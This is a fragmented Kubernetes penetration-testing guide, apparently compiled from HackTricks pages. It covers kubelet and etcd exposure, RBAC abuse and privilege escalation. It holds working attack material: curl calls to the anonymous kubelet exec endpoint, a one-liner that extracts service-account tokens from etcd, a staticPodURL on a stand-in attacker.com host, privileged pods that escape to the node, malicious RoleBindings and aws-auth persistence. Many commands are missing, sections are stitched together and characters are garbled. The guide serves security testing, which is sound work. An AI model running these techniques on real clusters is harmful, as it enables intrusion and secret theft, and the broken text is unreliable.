This service run in every node of the cluster. It's the service that will
control the pods inside the node. It talks with the kube-apiserver.
If you find this service exposed you might have found an unauthenticated
RCE.
Kubelet API
If you can list nodes you can get a list of kubelets endpoints with:
etcd API
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --
keys-only
Tiller
cAdvisor
Service useful to gather metrics.
NodePort
When a port is exposed in all the nodes via a NodePort, the same port is
opened in all the nodes proxifying the traffic into the declared Service. By
default this port will be in in the range 30000-32767. So new unchecked
services might be accessible through those ports.
If the ETCD can be accessed anonymously, you may need to use the
etcdctl tool. The following command will get all the keys stored:
Kubelet RCE
The Kubelet documentation explains that by default anonymous access
to the service is allowed:
kubelet-authentication-and-authorization.md
The Kubelet service API is not documented, but the source code can be
found here and finding the exposed endpoints is as easy as running:
curl -s
https://raw.githubusercontent.com/kubernetes/kubernetes/master/
pkg/kubelet/server/server.go | grep 'Path("/'
Path("/pods").
Path("/run")
Path("/exec")
Path("/attach")
Path("/portForward")
Path("/containerLogs")
Path("/runningpods/").
/pods
This endpoint list pods and their containers:
/exec
This endpoint allows to execute code inside any container very easily:
# Tthe command is passed as an array (split by spaces) and that
is a GET request.
curl -Gks
https://worker:10250/exec/{namespace}/{pod}/{container}
-d 'input=1' -d 'output=1' -d 'tty=1'
\
-d 'command=ls' -d 'command=/'
To automate the exploitation you can also use the script kubelet-anon-rce.
To avoid this attack the kubelet service should be run with --anonymous-
auth false and the service should be segregated at the network level.
For example, a remote attacker can abuse this by accessing the following
URL: http://<external-IP>:10255/pods
References
https://www.cyberark.com/resources/threat-research-blog/kubernetes-
pentest-methodology-part-2
https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet
"authentication": {
"anonymous": {
"enabled": true
},
The kubelet calls the TokenReview API on the configured API server to
determine user information from bearer tokens
"authentication": {
"x509": {
"clientCAFile": "/etc/kubernetes/pki/ca.crt"
}
}
Kubelet Authorization
Any request that is successfully authenticated (including an anonymous
request) is then authorized. The default authorization mode is
AlwaysAllow , which allows all requests.
However, the other possible value is webhook (which is what you will be
mostly finding out there). This mode will check the permissions of the
authenticated user to allow or disallow an action.
"authorization": {
"mode": "Webhook",
"webhook": {
"cacheAuthorizedTTL": "5m0s",
"cacheUnauthorizedTTL": "30s"
}
},
Action
HTTP
request verb
verb
POST create
get (for individual resources), list (for collections,
GET,
including full object content), watch (for watching an
HEAD
individual resource or collection of resources)
PUT update
PATCH patch
delete (for individual resources), deletecollection (for
DELETE
collections)
For example, the following request tried to access the pods info of kubelet
without permission:
curl -k --header "Authorization: Bearer ${TOKEN}"
'https://172.31.28.172:10250/pods'
Forbidden (user=system:node:ip-172-31-28-172.ec2.internal,
verb=get, resource=nodes, subresource=proxy)
Automatic Enumeration
Before starting enumerating the ways K8s offers to expose services to the
public, know that if you can list namespaces, services and ingresses, you
can find everything exposed to the public with:
ClusterIP
A ClusterIP service is the default Kubernetes service. It gives you a
service inside your cluster that other apps inside your cluster can access.
There is no external access.
Now, you can navigate through the Kubernetes API to access services using
this scheme:
http://localhost:8080/api/v1/proxy/namespaces/<NAMESPACE>/services
/<SERVICE-NAME>:<PORT-NAME>/
NodePort
NodePort opens a specific port on all the Nodes (the VMs), and any
traffic that is sent to this port is forwarded to the service. This is a really
bad option usually.
If you don't specify the nodePort in the yaml (it's the port that will be
opened) a port in the range 30000–32767 will be used.
LoadBalancer
Exposes the Service externally using a cloud provider's load balancer.
On GKE, this will spin up a Network Load Balancer that will give you a
single IP address that will forward all traffic to your service.
You have to pay for a LoadBalancer per exposed service, which can get
expensive.
ExternalName
Services of type ExternalName map a Service to a DNS name, not to a
typical selector such as my-service or cassandra . You specify these
Services with the spec.externalName parameter.
This Service definition, for example, maps the my-service Service in the
prod namespace to my.database.example.com :
apiVersion: v1
kind: Service
metadata:
name: my-service
namespace: prod
spec:
type: ExternalName
externalName: my.database.example.com
External IPs
Traffic that ingresses into the cluster with the external IP (as destination
IP), on the Service port, will be routed to one of the Service endpoints.
externalIPs are not managed by Kubernetes and are the responsibility of
the cluster administrator.
In the Service spec, externalIPs can be specified along with any of the
ServiceTypes . In the example below, " my-service " can be accessed by
clients on " 80.11.12.10:80 "( externalIP:port )
apiVersion: v1
kind: Service
metadata:
name: my-service
spec:
selector:
app: MyApp
ports:
- name: http
protocol: TCP
port: 80
targetPort: 9376
externalIPs:
- 80.11.12.10
Ingress
Unlike all the above examples, Ingress is NOT a type of service. Instead,
it sits in front of multiple services and act as a “smart router�? or
entrypoint into your cluster.
You can do a lot of different things with an Ingress, and there are many
types of Ingress controllers that have different capabilities.
The default GKE ingress controller will spin up a HTTP(S) Load Balancer
for you. This will let you do both path based and subdomain based routing
to backend services. For example, you can send everything on
foo.yourdomain.com to the foo service, and everything under the
yourdomain.com/bar/ path to the bar service.
The YAML for a Ingress object on GKE with a L7 HTTP Load Balancer
might look like this:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: my-ingress
spec:
backend:
serviceName: other
servicePort: 8080
rules:
- host: foo.mydomain.com
http:
paths:
- backend:
serviceName: foo
servicePort: 8080
- host: mydomain.com
http:
paths:
- path: /bar/*
backend:
serviceName: bar
servicePort: 8080
References
https://medium.com/google-cloud/kubernetes-nodeport-vs-
loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0
https://kubernetes.io/docs/concepts/services-networking/service/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation
You can check this docker breakouts to try to escape from a pod you have
compromised:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-
breakout
kubernetes-enumeration.md
Usually the pods are run with a service account token inside of them. This
service account may have some privileges attached to it that you could
abuse to move to other pods or even to escape to the nodes configured
inside the cluster. Check how in:
abusing-roles-clusterroles-in-kubernetes
Services
For this purpose, you can try to get all the services of the kubernetes
environment:
Scanning
The following Bash script (taken from a Kubernetes workshop) will install
and scan the IP ranges of the kubernetes cluster:
sudo apt-get update
sudo apt-get install nmap
nmap-kube ()
{
nmap --open -T4 -A -v -Pn -p
80,443,2379,8080,9090,9100,9093,4001,6782-
6784,6443,8443,9099,10250,10255,10256 "${@}"
}
nmap-kube-discover () {
local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed
's,[0-9][0-9]*/.*,*,');
local SERVER_RANGES=" ";
SERVER_RANGES+="10.0.0.1 ";
SERVER_RANGES+="10.0.1.* ";
SERVER_RANGES+="10.*.0-1.* ";
nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
Check out the following page to learn how you could attack Kubernetes
specific services to compromise other pods/all the environment:
pentesting-kubernetes-services.md
Sniffing
In case the compromised pod is running some sensitive service where
other pods need to authenticate you might be able to obtain the credentials
send from the other pods sniffing local communications.
Network Spoofing
By default techniques like ARP spoofing (and thanks to that DNS
Spoofing) work in kubernetes network. Then, inside a pod, if you have the
NET_RAW capability (which is there by default), you will be able to send
custom crafted network packets and perform MitM attacks via ARP
Spoofing to all the pods running in the same node.\ Moreover, if the
malicious pod is running in the same node as the DNS Server, you will be
able to perform a DNS Spoofing attack to all the pods in cluster.
kubernetes-network-attacks.md
Node DoS
There is no specification of resources in the Kubernetes manifests and not
applied limit ranges for the containers. As an attacker, we can consume all
the resources where the pod/deployment running and starve other
resources and cause a DoS for the environment.
You can see the difference between while running stress-ng and after
/var/lib/kubelet/kubeconfig
/var/lib/kubelet/kubelet.conf
/var/lib/kubelet/config.yaml
/var/lib/kubelet/kubeadm-flags.env
/etc/kubernetes/kubelet-kubeconfig
Steal Secrets
# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i
create pod -n kube-system
The script can-they.sh will automatically get the tokens of other pods and
check if they have the permission you are looking for (instead of you
looking 1 by 1):
Privileged DaemonSets
A DaemonSet is a pod that will be run in all the nodes of the cluster.
Therefore, if a DaemonSet is configured with a privileged service account,
in ALL the nodes you are going to be able to find the token of that
privileged service account that you could abuse.
The exploit is the same one as in the previous section, but you now don't
depend on luck.
Pivot to Cloud
If the cluster is managed by a cloud service, usually the Node will have a
different access to the metadata endpoint than the Pod. Therefore, try to
access the metadata endpoint from the node (or from a pod with
hostNetwork to True):
kubernetes-pivoting-to-clouds.md
Steal etcd
If you can specify the nodeName of the Node that will run the container,
get a shell inside a control-plane node and get the etcd database:
control-plane nodes have the role master and in cloud managed clusters
you won't be able to run anything in them.
Read secrets from etcd
If you can run your pod on a control-plane node using the nodeName
selector in the pod spec, you might have easy access to the etcd database,
which contains all of the configuration for the cluster, including all secrets.
Below is a quick and dirty way to grab secrets from etcd if it is running
on the control-plane node you are on. If you want a more elegant solution
that spins up a pod with the etcd client utility etcdctl and uses the
control-plane node's credentials to connect to etcd wherever it is running,
check out this example manifest from @mauilion.
Output:
data-dir=/var/lib/etcd
Extract the tokens from the database and show the service account
name
db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db"
| grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep
registry`; echo $name \| $x; echo; done
Same command, but some greps to only return the default token in the
kube-system namespace
Output:
1/registry/secrets/kube-system/default-token-d82kb |
eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
Therefore, static Pods are always bound to one Kubelet on a specific node.
The kubelet automatically tries to create a mirror Pod on the
Kubernetes API server for each static Pod. This means that the Pods
running on a node are visible on the API server, but cannot be controlled
from there. The Pod names will be suffixed with the node hostname with a
leading hyphen.
The spec of a static Pod cannot refer to other API objects (e.g.,
ServiceAccount, ConfigMap, Secret, etc. So you cannot abuse this
behaviour to launch a pod with an arbitrary serviceAccount in the
current node to compromise the cluster. But you could use this to run pods
in different namespaces (in case thats useful for some reason).
If you are inside the node host you can make it create a static pod inside
itself. This is pretty useful because it might allow you to create a pod in a
different namespace like kube-system.
In order to create a static pod, the docs are a great help. You basically need
2 things:
Modify the param staticPodURL from kubelet config file and set
something like staticPodURL: http://attacker.com:8765/pod.yaml .
This will make the kubelet process create a static pod getting the
configuration from the indicated URL.
apiVersion: v1
kind: Pod
metadata:
name: bad-priv2
namespace: kube-system
spec:
containers:
- name: bad
hostPID: true
image: gcr.io/shmoocon-talk-hacking/brick
stdin: true
tty: true
imagePullPolicy: IfNotPresent
volumeMounts:
- mountPath: /chroot
name: host
securityContext:
privileged: true
volumes:
- name: host
hostPath:
path: /
type: Directory
In this folder you might find config files with tokens and configurations
to connect to the API server. In this folder you can also find a cache
folder with information previously retrieved.
/run/secrets/kubernetes.io/serviceaccount
/var/run/secrets/kubernetes.io/serviceaccount
/secrets/kubernetes.io/serviceaccount
Now that you have the token, you can find the API server inside the
environment variable KUBECONFIG . For more info run (env | set) |
grep -i "kuber|kube "
The service account token is being signed by the key residing in the file
sa.key and validated by sa.pub.
/etc/kubernetes/pki
/var/lib/localkube/certs
Hot Pods
Hot pods are pods containing a privileged service account token. A
privileged service account token is a token that has permission to do
privileged tasks such as listing secrets, creating pods, etc.
RBAC
If you don't know what is RBAC, read this section.
Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this:
With those details you can enumerate kubernetes. If the API for some
reason is accessible through the Internet, you can just download that info
and enumerate the platform from your host.
If you have the list permission, you are allowed to execute API requests
to list a type of asset ( get option in kubectl ):
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
If you have the watch permission, you are allowed to execute API
requests to monitor assets:
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?
watch=true
GET
/apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}
[DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments
[DEPRECATED]
GET /apis/apps/v1/watch/deployments [DEPRECATED]
They open a streaming connection that returns you the full manifest of a
Deployment whenever it changes (or when a new one is created).
The following kubectl commands indicates just how to list the objects. If
you want to access the data you need to use describe instead of get
Using curl
From inside a pod you can use several env variables:
export
APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_
HTTPS}
export
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization:
Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve
this.
By default the pod can access the kube-api server in the domain name
kubernetes.default.svc and you can see the kube network in
/etc/resolv.config as here you will find the address of the kubernetes
DNS server (the ".1" of the same range is the kube-api endpoint).
Using kubectl
Having the token and the address of the API server you use kubectl or curl
to access it as indicated here:
You can find an official kubectl cheatsheet here. The goal of the following
sections is to present in ordered manner different options to enumerate and
understand the new K8s you have obtained access to.
To find the HTTP request that kubectl sends you can use the parameter
-v=8
Current Configuration
Kubectl
# Change namespace
kubectl config set-context --current --namespace=<namespace>
If you managed to steal some users credentials you can configure them
locally using something like:
kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your
ca certificate ) \
--auth-provider-arg=id-token=( your id_token )
kubectl
API
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary
$'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authori
zation.k8s.io/v1\",\"metadata\":
{\"creationTimestamp\":null},\"spec\":
{\"namespace\":\"default\"},\"status\":
{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\
":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrul
esreviews"
kubernetes-role-based-access-control-rbac.md
Once you know which privileges you have, check the following page to
figure out if you can abuse them to escalate privileges:
abusing-roles-clusterroles-in-kubernetes
k get roles
k get clusterroles
API
kurl -k -v
"https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eev
ee/roles?limit=500"
kurl -k -v
"https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eev
ee/clusterroles?limit=500"
Get namespaces
Kubernetes supports multiple virtual clusters backed by the same physical
cluster. These virtual clusters are called namespaces.
kubectl
k get namespaces
API
kurl -k -v https://$APISERVER/api/v1/namespaces/
Get secrets
kubectl
API
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
kurl -v
https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
If you can read secrets you can use the following lines to get the privileges
related to each to token:
kubectl
k get serviceaccounts
API
kurl -k -v
https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccount
s
Get Deployments
The deployments specify the components that need to be run.
kubectl
.k get deployments
k get deployments -n custnamespace
API
kurl -v
https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
Get Pods
The Pods are the actual containers that will run.
kubectl
k get pods
k get pods -n custnamespace
API
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
Get Services
Kubernetes services are used to expose a service in a specific port and IP
(which will act as load balancer to the pods that are actually offering the
service). This is interesting to know where you can find other services to try
to attack.
kubectl
k get services
k get services -n custnamespace
API
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
Get nodes
Get all the nodes configured inside the cluster.
kubectl
k get nodes
API
kurl -v https://$APISERVER/api/v1/nodes/
Get DaemonSets
DaeamonSets allows to ensure that a specific pod is running in all the
nodes of the cluster (or in the ones selected). If you delete the DaemonSet
the pods managed by it will be also removed.
kubectl
k get daemonsets
API
kurl -v
https://$APISERVER/apis/extensions/v1beta1/namespaces/default/d
aemonsets
Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod
that will perform some action.
kubectl
k get cronjobs
API
kurl -v
https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cr
onjobs
Get "all"
kubectl
k get all
resources --namespaced=true
The verbs is an array that contains the allowed verbs. The verb in
Kubernetes defines the type of action you need to apply to the
resource. For example, the list verb is used against collections while
"get" is used against a single resource.
Rules Verbs
(This info was taken from here)
HTTP
request verb
verb
POST create
get (for individual resources), list (for collections,
GET,
including full object content), watch (for watching an
HEAD
individual resource or collection of resources)
PUT update
PATCH patch
delete (for individual resources), deletecollection (for
DELETE
collections)
PodSecurityPolicy
use verb on podsecuritypolicies resources in the policy
API group.
RBAC
bind and escalate verbs on roles and clusterroles
You can find all the verbs that each resource support executing kubectl
api-resources --sort-by name -o wide
Examples
Role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: defaultGreen
name: pod-and-pod-logs-reader
rules:
- apiGroups: [""]
resources: ["pods", "pods/log"]
verbs: ["get", "list", "watch"]
ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
# "namespace" omitted since ClusterRoles are not namespaced
name: secret-reader
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "watch", "list"]
For example you can use a ClusterRole to allow a particular user to run:
piVersion: rbac.authorization.k8s.io/v1
# This role binding allows "jane" to read pods in the "default"
namespace.
# You need to already have a Role named "pod-reader" in that
namespace.
kind: RoleBinding
metadata:
name: read-pods
namespace: default
subjects:
# You can specify more than one "subject"
- kind: User
name: jane # "name" is case sensitive
apiGroup: rbac.authorization.k8s.io
roleRef:
# "roleRef" specifies the binding to a Role / ClusterRole
kind: Role #this must be Role or ClusterRole
name: pod-reader # this must match the name of the Role or
ClusterRole you wish to bind to
apiGroup: rbac.authorization.k8s.io
ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
# This cluster role binding allows anyone in the "manager"
group to read secrets in any namespace.
kind: ClusterRoleBinding
metadata:
name: read-secrets-global
subjects:
- kind: Group
name: manager # Name is case sensitive
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: secret-reader
apiGroup: rbac.authorization.k8s.io
# List Roles
kubectl get roles
kubectl describe roles
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: api-resource-verbs-all
rules:
rules:
- apiGroups: ["*"]
resources: ["*"]
verbs: ["*"]
So just create the malicious pod and expect the secrets in port 6666:
super_privs.yaml
apiVersion: v1
kind: Pod
metadata:
name: ubuntu
labels:
app: ubuntu
spec:
# Uncomment and specify a specific node you want to debug
# nodeName: <insert-node-name-here>
containers:
- image: ubuntu
command:
- "sleep"
- "3600" # adjust this as needed -- use only as long as
you need
imagePullPolicy: IfNotPresent
name: ubuntu
securityContext:
allowPrivilegeEscalation: true
privileged: true
#capabilities:
# add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities
you need https://man7.org/linux/man-
pages/man7/capabilities.7.html
runAsUser: 0 # run as root (or any other user)
volumeMounts:
- mountPath: /host
name: host-volume
restartPolicy: Never # we want to be intentional about
running this pod
hostIPC: true # Use the host's ipc namespace
https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
hostNetwork: true # Use the host's network namespace
https://www.man7.org/linux/man-
pages/man7/network_namespaces.7.html
hostPID: true # Use the host's pid namespace
https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
volumes:
- name: host-volume
hostPath:
path: /
Now that you can escape to the node check post-exploitation techniques in:
Stealth
You probably want to be stealthier, in the following pages you can see
what you would be able to access if you create a pod only enabling some of
the mentioned privileges in the previous template:
Privileged + hostPID
Privileged only
hostPath
hostPID
hostNetwork
hostIPC
You can find example of how to create/abuse the previous privileged pods
configurations in https://github.com/BishopFox/badPods
pod-escape-privileges.md
In line 6 you can find the object “spec�? and children objects such as
“template�? in line 10. These objects hold the configuration for the task
we wish to accomplish. Another thing to notice is the
"serviceAccountName" in line 15 and the “containers�? object in line
18. This is the part that relates to creating our malicious container.
So, the privilege to create or update tasks can also be abused for
privilege escalation in the cluster.
Pods Exec
pods/exec is a resource in kubernetes used for running commands in a
shell inside a pod. This privilege is meant for administrators who want to
access containers and run commands. It’s just like creating a SSH session
for the container.
If we have this privilege, we actually get the ability to take control of all
the pods. In order to do that, we needs to use the following command:
kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
Note that as you can get inside any pod, you can abuse other pods token just
like in Pod Creation exploitation to try to escalate privileges.
port-forward
This permission allows to forward one local port to one port in the
specified pod. This is meant to be able to debug applications running inside
a pod easily, but an attacker might abuse it to get access to interesting (like
DBs) or vulnerable applications (webs?) inside a pod:
allowedHostPaths:
- pathPrefix: "/foo"
readOnly: true
Which was meant to prevent escapes like the previous ones by, instead of
using a a hostPath mount, use a PersistentVolume and a
PersistentVolumeClaim to mount a hosts folder in the container with
writable access:
apiVersion: v1
kind: PersistentVolume
metadata:
name: task-pv-volume-vol
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: task-pv-claim-vol
spec:
storageClassName: manual
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
name: task-pv-pod
spec:
volumes:
- name: task-pv-storage-vol
persistentVolumeClaim:
claimName: task-pv-claim-vol
containers:
- name: task-pv-container
image: ubuntu:latest
command: [ "sh", "-c", "sleep 1h" ]
volumeMounts:
- mountPath: "/hostlogs"
name: task-pv-storage-vol
attributes:
It's also possible to perform the same action via the API REST
endpoint:
Listing Secrets
The listing secrets privilege is a strong capability to have in the cluster. A
user with the permission to list secrets can potentially view all the secrets
in the cluster – including the admin keys. The secret key is a JWT token
encoded in base64.
An attacker that gains access to _list secrets_ in the cluster can use the
following curl commands to get all secrets in “kube-system�? namespace:
When looking inside the source code, it appears that the token is generated
from only 27 characters “bcdfghjklmnpqrstvwxz2456789�? and not 36 (a-
z and 0-9)
This means that there are 275 = 14,348,907 possibilities for a token.
So, with the new node CSR approved, you can abuse the special
permissions of nodes to steal secrets and escalate privileges.
In this post and this one the GKE K8s TLS Bootstrap configuration is
configured with automatic signing and it's abused to generate credentials
of a new K8s Node and then abuse those to escalate privileges by stealing
secrets. If you have the mentioned privileges yo could do the same thing.
Note that the first example bypasses the error preventing a new node to
access secrets inside containers because a node can only access the secrets
of containers mounted on it.
The way to bypass this is just to create a node credentials for the node
name where the container with the interesting secrets is mounted (but
just check how to do it in the first post):
"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-
6c73b1-8cj1"
{ % code overflow="wrap" %}
# Check if config map exists
get configmap aws-auth -n kube-system -o yaml
## Yaml example
apiVersion: v1
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
data:
mapRoles: |
- rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
username: system:node:{ {EC2PrivateDNSName}}
groups:
- system:masters
# Modify it
kubectl edit -n kube-system configmap/aws-auth
## You can modify it to even give access to users from other
accounts
data:
mapRoles: |
- rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
username: system:node:{ {EC2PrivateDNSName}}
groups:
- system:masters
mapUsers: |
- userarn: arn:aws:iam::098765432123:user/SomeUserTestName
username: admin
groups:
- system:masters
You can use aws-auth for persistence giving access to users from other
accounts.
Escalating in GKE
There are 2 ways to assign K8s permissions to GCP principals. In any
case the principal also needs the permission container.clusters.get to
be able to gather credentials to access the cluster, or you will need to
generate your own kubectl config file (follow the next link).
When talking to the K8s api endpoint, the GCP auth token will be sent.
Then, GCP, through the K8s api endpoint, will first check if the principal
(by email) has any access inside the cluster, then it will check if it has any
access via GCP IAM.\ If any of those are true, he will be responded. If
not an error suggesting to give permissions via GCP IAM will be given.
Then, the first method is using GCP IAM, the K8s permissions have their
equivalent GCP IAM permissions, and if the principal have it, it will be
able to use it.
gcp-container-privesc.md
The second method is assigning K8s permissions inside the cluster to the
identifying the user by its email (GCP service accounts included).
ephemeralcontainers
Principals that can update or patch pods/ephemeralcontainers can
gain code execution on other pods, and potentially break out to their node
by adding an ephemeral container with a privileged securityContext
ValidatingWebhookConfigurations or
MutatingWebhookConfigurations
Principals with any of the verbs create , update or patch over
validatingwebhookconfigurations or mutatingwebhookconfigurations
Escalate
As you can read in the next section: Built-in Privileged Escalation
Prevention, a principal cannot update neither create roles or clusterroles
without having himself those new permissions. Except if he has the verb
escalate over roles or clusterroles .\ Then he can update/create
new roles, clusterroles with better permissions than the ones he has.
Nodes proxy
Principals with access to the nodes/proxy subresource can execute code
on pods via the Kubelet API (according to this). More information about
Kubelet authentication in this page:
kubelet-authentication-and-authorization.md
{ % code overflow="wrap" %}
patch_node_capacity(){
curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H
"Content-Type: json-patch+json" -d '[{"op": "replace",
"path":"/status/allocatable/pods", "value": "0"}]'
}
A user can only create/update a role if they already have all the
permissions contained in the role, at the same scope as the role
(cluster-wide for a ClusterRole, within the same namespace or cluster-
wide for a Role)
The purpose of this JSON file is to bind the admin “CluserRole�? (line 11)
to the compromised service account (line 16).
Now, all we need to do is to send our JSON as a POST request to the API
using the following CURL command:
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" \
-H "Content-Type: application/json" \
https://<master_ip>:
<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rol
ebindings
-d @malicious-RoleBinging.json
Wait again, until you see the change in pod status. Now, you can see
ErrImagePull error. Check the image name with either of the queries.
As you can see in the above image, we tried running image nginx but the
final executed image is rewanthtammana/malicious-image . What just
happened!!?
Technicalities
We will unfold what just happened. The ./deploy.sh script that you
executed, created a mutating webhook admission controller. The below
lines in the mutating webhook admission controller are responsible for the
above results.
The above snippet replaces the first container image in every pod with
rewanthtammana/malicious-image .
Best Practices
Prevent service account token automounting on
pods
When a pod is being created, it automatically mounts a service account (the
default is default service account in the same namespace). Not every pod
needs the ability to utilize the API from within itself.
https://github.com/aquasecurity/kube-hunter
https://github.com/aquasecurity/kube-bench
References
https://www.cyberark.com/resources/threat-research-blog/securing-
kubernetes-clusters-by-eliminating-risky-permissions
https://www.cyberark.com/resources/threat-research-blog/kubernetes-
pentest-methodology-part-1
Just executing something like the following will allow you to escape from
the pod:
Configuration example:
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts",
"--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on
the control-plane node by uncommenting this line and changing
to a control-plane node name
Privileged only
Support HackTricks and get benefits!
Kubernetes Roles Abuse Lab
Support HackTricks and get benefits!
You can run these labs just inside minikube.
Pod Creation -> Escalate to ns SAs
We are going to create:
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: ServiceAccount
name: test-sa
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["apps"]
resources: ["daemonsets"]
verbs: ["get", "list", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io' | kubectl apply -f -
Patch Daemonset
In this case we are going to patch a daemonset to make its pod load our
desired service account.
If your user has the verb update instead of patch, this won't work.
# Create Service Account test-sa
# Create role and rolebinding to give list & update patch
permissions over daemonsets in default namespace to user Test
# Create clusterrole and clusterrolebinding to give the SA
test-sa access to secrets everywhere
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["apps"]
resources: ["daemonsets"]
verbs: ["get", "list", "patch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: User
name: Test
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "delete", "patch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: test-crb
subjects:
- kind: ServiceAccount
namespace: default
name: test-sa
apiGroup: ""
roleRef:
kind: ClusterRole
